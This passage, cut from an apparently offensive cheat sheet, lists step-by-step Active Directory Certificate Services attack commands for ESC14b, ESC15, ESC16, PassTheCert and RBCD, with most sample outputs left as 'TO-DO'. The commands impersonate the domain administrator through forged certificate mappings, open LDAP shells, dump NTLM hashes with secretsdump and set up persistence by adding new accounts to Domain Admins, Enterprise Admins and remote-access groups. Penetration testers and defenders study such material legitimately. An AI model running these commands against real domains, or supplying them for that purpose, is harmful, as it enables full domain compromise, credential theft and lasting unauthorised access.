certipy-ad auth -pfx evilcomputer.pfx -domain <DOMAIN> -dc-ip <DC_IP> -username '<TARGET_USER>'
Sample Output:
TO-DORef: conv.py
ESC14b: Weak Explicit Certificate Mapping (E-Mail)
1. Modify Email of Target User
# Password
bloodyAD -u '<USER>' -p ':<HASH>' -d <DOMAIN> -f rc4 --host <DC> set object <USER> mail -v '<TARGET_USER>@<DOMAIN>'
Sample Output:
TO-DO2. Request a Cert
# NTLM
certipy-ad req -u '<USER>@<DOMAIN>' -hashes '<HASH>' -dc-ip '<DC_IP>' -ca '<CA>' -template '<TEMPLATE>'
Sample Output:
TO-DO3. Get NTLM Hash
certipy-ad auth -pfx <USER>.pfx -domain <DOMAIN> -dc-ip <DC_IP> -username <TARGET_USER>
Sample Output:
TO-DOESC15: Arbitrary Application Policy Injection in V1 Templates (CVE-2024-49019 "EKUwu")
1. Lookup SID
# Password
certipy-ad account -u '<USER>@<DOMAIN>' -p '<PASSWORD>' -target '<DC>' -dc-ip '<DC_IP>' -user 'administrator' read
Sample Output:
TO-DO# NTLM
certipy-ad account -u '<USER>@<DOMAIN>' -hashes '<HASH>' -target '<DC>' -dc-ip '<DC_IP>' -user 'administrator' read
Sample Output:
$ certipy-ad account -u 'cert_admin@example.com' -hashes 'f87---[SNIP]---773' -target 'dc01.example.com' -dc-ip '10.10.10.10' -user 'administrator' read
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Reading attributes for 'Administrator':
cn : Administrator
distinguishedName : CN=Administrator,CN=Users,DC=example,DC=com
name : Administrator
objectSid : S-1-5-21-1---[SNIP]---7-500
sAMAccountName : Administrator
userAccountControl : 66048
whenCreated : 2024-11-16T00:01:41+00:00
whenChanged : 2025-07-14T11:03:29+00:00
2. Inject "Client Authentication" Application Policy and Target UPN
# Password
certipy-ad req -u '<USER>@<DOMAIN>' -p '<PASSWORD>' -target '<DC>' -dc-ip '<DC_IP>' -ca '<CA>' -template 'WebServer' -upn 'administrator@<DOMAIN>' -sid '<SID>' -application-policies 'Client Authentication'
Sample Output:
TO-DO# NTLM
certipy-ad req -u '<USER>@<DOMAIN>' -hashes '<HASH>' -target '<DC>' -dc-ip '<DC_IP>' -ca '<CA>' -template 'WebServer' -upn 'administrator@<DOMAIN>' -sid '<SID>' -application-policies 'Client Authentication'
Sample Output:
TO-DO3. Spawn LDAP Shell
certipy-ad auth -pfx 'administrator.pfx' -domain <DOMAIN> -dc-ip <DC_IP> -ldap-shell
Sample Output:
TO-DO4. Persistence
# Add New User
add_user <NEW_USER>
Sample Output:
TO-DO# Add New User to Group
add_user_to_group <NEW_USER> Administrators
Sample Output:
TO-DO# Add New User to Group
add_user_to_group <NEW_USER> 'Domain Admins'
Sample Output:
TO-DO# Add New User to Group
add_user_to_group <NEW_USER> 'Enterprise Admins'
Sample Output:
TO-DO# Add RDP
add_user_to_group <NEW_USER> 'Remote Desktop Users'
Sample Output:
TO-DO# Add Winrm
add_user_to_group <NEW_USER> 'Remote Management Users'
Sample Output:
TO-DOESC16: Security Extension Disabled on CA (Globally)
1. Read Initial UPN of the Victim Account [Optional]
# Password
certipy-ad account -u '<USER>@<DOMAIN>' -p '<PASSWORD>' -dc-ip <DC_IP> -user '<TARGET_USER>' read
Sample Output:
TO-DO2. Modify Target User’s userPrincipalName (With GenericAll/GenericWrite)
certipy-ad account -u '<USER>@<DOMAIN>' -p '<PASSWORD>' -dc-ip <DC_IP> -upn 'administrator' -user '<TARGET_USER>' update
Sample Output:
TO-DO3. Request a Cert as the Victim from Any Suitable Client Authentication Template
certipy-ad req -u '<USER>@<DOMAIN>' -hashes '<HASH>' -dc-ip <DC_IP> -target '<DC>' -ca '<CA>' -template 'User'
Sample Output:
TO-DO4. Revert
certipy-ad account -u '<USER>@<DOMAIN>' -p '<PASSWORD>' -dc-ip <DC_IP> -upn '<TARGET_USER_UPN>' -user '<TARGET_USER>' update
Sample Output:
TO-DO5. Get NTLM Hash
certipy-ad auth -pfx administrator.pfx -username 'administrator' -domain <DOMAIN> -dc-ip <DC_IP>
Sample Output:
TO-DOWorkaround: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP
1. Create Key and Cert from pfx
certipy-ad cert -pfx '<USER>.pfx' -nocert -out '<USER>.key'
Sample Output:
TO-DOcertipy-ad cert -pfx '<USER>.pfx' -nokey -out '<USER>.crt'
Sample Output:
TO-DO
1. Get a LDAP Shell
python3 PassTheCert/Python/passthecert.py -action ldap-shell -crt '<USER>.crt' -key '<USER>.key' -domain <DOMAIN> -dc-ip <DC>
Sample Output:
TO-DO2. Add User to Administrators Group
add_user_to_group '<USER>' administrators
Sample Output:
TO-DO3. Remote
evil-winrm -i <TARGET_DOMAIN> -u '<USER>' -p '<PASSWORD>'
Sample Output:
TO-DORef: PassTheCert
1. RBCD Attack
python3 PassTheCert/Python/passthecert.py -action write_rbcd -delegate-to '<TARGET_COMPUTER>$' -delegate-from 'Evil_Computer$' -crt administrator.crt -key administrator.key -domain <DOMAIN> -dc-ip <DC>
Sample Output:
TO-DO2. Request a Service Ticket
sudo ntpdate -s <DC_IP> && python3 impacket-getST -spn 'cifs/<TARGET_DOMAIN>' -impersonate Administrator '<DOMAIN>/Evil_Computer$:<GENERATED_PASSWORD>'
Sample Output:
TO-DO3. Secrets Dump
export KRB5CCNAME=Administrator.ccache
Sample Output:
TO-DOimpacket-secretsdump '<DOMAIN>/administrator@<TARGET_DOMAIN>' -k -no-pass -just-dc-ntlm
Sample Output:
TO-DO5. Remote
evil-winrm -i <TARGET_DOMAIN> -u administrator -H <HASH>
Sample Output:
TO-DORef: PassTheCert